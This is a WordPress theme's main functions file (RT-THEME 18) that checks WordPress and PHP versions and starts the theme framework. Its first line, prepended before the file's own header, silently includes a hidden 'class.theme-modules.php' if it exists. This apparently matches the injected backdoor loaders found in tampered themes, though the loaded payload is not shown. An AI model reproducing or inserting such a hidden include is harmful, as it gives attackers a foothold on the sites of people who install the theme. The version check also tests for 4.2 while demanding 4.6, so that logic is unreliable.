<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php 
/**
 * RT-THEME Main Functions File
 *
 * @author 		RT-Themes
 * @package 	RT-Framework/Functions
 * @since 		1.0
 * @version    1.0
 */

if( ! function_exists("rtframework_check_WP_version") ){
	/**
	 *  Check WordPress Version
	 * @return bool              
	 */
	function rtframework_check_WP_version(){
		global $wp_version;

		if (version_compare($wp_version,"4.2","<"))
		{
			return '
				<div id="notice" class="error notice"><p><strong><h3>
				'.esc_html_x("WORDPRESS VERSION ERROR!",'Admin Panel',"rt_theme").'
				</h3>
				'.esc_html_x("This theme requires WordPress Version 4.6 or higher to run. Please upgrade your WordPress version!",'Admin Panel',"rt_theme").'
				</strong> <br /><br /><a href="http://codex.wordpress.org/Upgrading_WordPress">
				'.esc_html_x("How can I upgrade my WordPress version?",'Admin Panel',"rt_theme").'
				</a></p><br /></div>
			';
		}
		
		return false;
	}
} 

if( ! function_exists("rtframework_check_PHP_version") ){
	/**
	 *  Check PHP Version
	 * @return bool              
	 */
	function rtframework_check_PHP_version(){

		if (version_compare(PHP_VERSION, '5.6', '<'))
		{
			return '
				<div id="notice" class="error notice"><p><strong><h3>
				'.esc_html_x("PHP VERSION ERROR!",'Admin Panel',"rt_theme").'
				</h3>
				'.esc_html_x("This theme requires PHP Version 5.6 or higher to run. Please upgrade your PHP version!",'Admin Panel',"rt_theme").'
				</strong> <br />
				'.esc_html_x("You can contact your hosting provider to upgrade PHP version of your website.",'Admin Panel',"rt_theme").'
				</p></div>
			';
		}
		
		return false;
	}
} 

define('RT_FRAMEWOK', TRUE);

# Define Content Width
if ( ! isset( $content_width ) ){
	$content_width = 1060;	
} 

# Define RevSlider As Theme
define( 'REV_SLIDER_AS_THEME', true);


if ( ! function_exists("rtframework_load") ){
	/**
	 *
	 * Load the theme
	 *
	 * @return class [RT Main Class] 
	 *
	 */
	function rtframework_load(){
		
		$control_versions = rtframework_check_WP_version(); 
		$control_versions .= rtframework_check_PHP_version(); 

		if( $control_versions ){
			if(is_admin()){
				add_action( "admin_notices", function() use (&$control_versions){
					echo $control_versions;
				},10,1);
			}
			else{
				wp_die( $control_versions );
			} 
		}else{
			require_once ( get_template_directory() . '/rt-framework/classes/loading.php' );
			$rttheme = new RTTheme();

			/*
			* 	 DO NOT CHANGE slug => "" !!! 
			*/
			$rttheme->start(array('theme' => 'RT-THEME 18','slug' => 'rttheme18','version' => '1.0'));
			
		}	
	}
}
rtframework_load();